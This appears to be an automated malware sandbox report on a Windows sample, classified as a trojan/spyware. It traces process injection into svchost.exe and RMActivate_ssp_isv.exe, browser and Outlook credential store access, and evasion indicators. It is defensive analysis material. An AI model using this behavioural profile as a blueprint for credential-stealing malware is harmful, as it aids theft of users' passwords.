                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9FF096_2_02F9FF09
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9FCF26_2_02F9FCF2
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F59C326_2_02F59C32
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EFFDC06_2_02EFFDC0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F97D736_2_02F97D73
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F91D5A6_2_02F91D5A
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE3D406_2_02EE3D40
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_00611B106_2_00611B10
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060CA106_2_0060CA10
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060CA146_2_0060CA14
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060CC306_2_0060CC30
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060AC106_2_0060AC10
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060AD606_2_0060AD60
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060AD546_2_0060AD54
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_006151E06_2_006151E0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_006133CB6_2_006133CB
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_006133D06_2_006133D0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0062B9806_2_0062B980
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02C9E2186_2_02C9E218
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02C9E3336_2_02C9E333
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02C9E6CE6_2_02C9E6CE
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02C9D7986_2_02C9D798
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: String function: 02F27E54 appears 102 times
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: String function: 02F4EA12 appears 86 times
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: String function: 02F15130 appears 58 times
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: String function: 02ECB970 appears 280 times
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: String function: 02F5F290 appears 105 times
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: String function: 00437DE1 appears 36 times
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: String function: 00450AE3 appears 70 times
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: String function: 00458900 appears 42 times
                Source: BLv4mI7zzY.exe, 00000000.00000003.2129978395.0000000003DA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BLv4mI7zzY.exe
                Source: BLv4mI7zzY.exe, 00000000.00000003.2128032029.0000000003F4D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BLv4mI7zzY.exe
                Source: BLv4mI7zzY.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@6/3
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049A06A GetLastError,FormatMessageW,0_2_0049A06A
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004881CB AdjustTokenPrivileges,CloseHandle,0_2_004881CB
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004887E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004887E1
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0049B333
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004AEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_004AEE0D
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0049C397
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00434E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00434E89
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeFile created: C:\Users\user\AppData\Local\Temp\autFE60.tmpJump to behavior
                Source: BLv4mI7zzY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RMActivate_ssp_isv.exe, 00000006.00000003.2814173192.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000003.2814065216.000000000078F000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.00000000007E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: BLv4mI7zzY.exeVirustotal: Detection: 56%
                Source: BLv4mI7zzY.exeReversingLabs: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\BLv4mI7zzY.exe "C:\Users\user\Desktop\BLv4mI7zzY.exe"
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BLv4mI7zzY.exe"
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe "C:\Windows\SysWOW64\RMActivate_ssp_isv.exe"
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BLv4mI7zzY.exe"Jump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe "C:\Windows\SysWOW64\RMActivate_ssp_isv.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: BLv4mI7zzY.exeStatic file information: File size 1198080 > 1048576
                Source: BLv4mI7zzY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: BLv4mI7zzY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: BLv4mI7zzY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: BLv4mI7zzY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: BLv4mI7zzY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: BLv4mI7zzY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: BLv4mI7zzY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XNNdkVYUhBbatb.exe, 00000005.00000000.2541536503.000000000036E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: rmactivate_ssp_isv.pdb source: svchost.exe, 00000002.00000003.2591648376.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2591551520.000000000301A000.00000004.00000020.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702781389.0000000000E0F000.00000004.00000001.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702694345.00000000057E1000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: BLv4mI7zzY.exe, 00000000.00000003.2127277908.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, BLv4mI7zzY.exe, 00000000.00000003.2136217701.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624304199.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624304199.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527010916.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2525232719.0000000003300000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000003.2622792631.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000003.2626116189.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.000000000303E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BLv4mI7zzY.exe, 00000000.00000003.2127277908.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, BLv4mI7zzY.exe, 00000000.00000003.2136217701.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2624304199.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624304199.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527010916.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2525232719.0000000003300000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, RMActivate_ssp_isv.exe, 00000006.00000003.2622792631.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000003.2626116189.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.000000000303E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005BBC000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000034CC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000733000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FAAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005BBC000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000034CC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000733000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FAAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: rmactivate_ssp_isv.pdbGCTL source: svchost.exe, 00000002.00000003.2591648376.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2591551520.000000000301A000.00000004.00000020.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702781389.0000000000E0F000.00000004.00000001.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702694345.00000000057E1000.00000004.00000001.00020000.00000000.sdmp
                Source: BLv4mI7zzY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: BLv4mI7zzY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: BLv4mI7zzY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: BLv4mI7zzY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: BLv4mI7zzY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00434B37 LoadLibraryA,GetProcAddress,0_2_00434B37
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0043C4C6 push A30043BAh; retn 0043h0_2_0043C50D
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00458945 push ecx; ret 0_2_00458958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041701F push ecx; iretd 2_2_00417020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004118C3 push esi; iretd 2_2_004118CE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004118BB push esi; iretd 2_2_004118CE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411934 push ecx; iretd 2_2_00411951
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A9D7 push esi; retf 2_2_0040A9EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403260 push eax; ret 2_2_00403262
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418ABD push edi; iretd 2_2_00418ACF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A4DC pushfd ; iretd 2_2_0041A4E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx2_2_037309B6
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F4210 push eax; retf 5_2_027F4212
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027E8B94 push cs; iretd 5_2_027E8B95
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F0099 push esi; iretd 5_2_027F00A4
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F0091 push esi; iretd 5_2_027F00A4
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F010A push ecx; iretd 5_2_027F0127
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027E91AD push esi; retf 5_2_027E91C4
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F66CA push FFFFFFFEh; retf 5_2_027F66CC
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F57F5 push ecx; iretd 5_2_027F57F6
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F3CCD push ecx; iretd 5_2_027F3DB6
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F3D68 push ecx; iretd 5_2_027F3DB6
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F3DB7 push ecx; iretd 5_2_027F3DB6
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02ED09AD push ecx; mov dword ptr [esp], ecx6_2_02ED09B6
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_00612294 push ecx; iretd 6_2_0061237D
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0061237E push ecx; iretd 6_2_0061237D
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0061232F push ecx; iretd 6_2_0061237D
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060E660 push esi; iretd 6_2_0060E66B
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060E658 push esi; iretd 6_2_0060E66B
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060E6D1 push ecx; iretd 6_2_0060E6EE
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_00617279 pushfd ; iretd 6_2_0061727F
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_00607774 push esi; retf 6_2_0060778B
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004348D7
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004B5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004B5376
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00453187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00453187
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeAPI/Special instruction interceptor: Address: 1F93224
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeWindow / User API: threadDelayed 2277Jump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeWindow / User API: threadDelayed 7697Jump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-101913
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeAPI coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeAPI coverage: 2.7 %
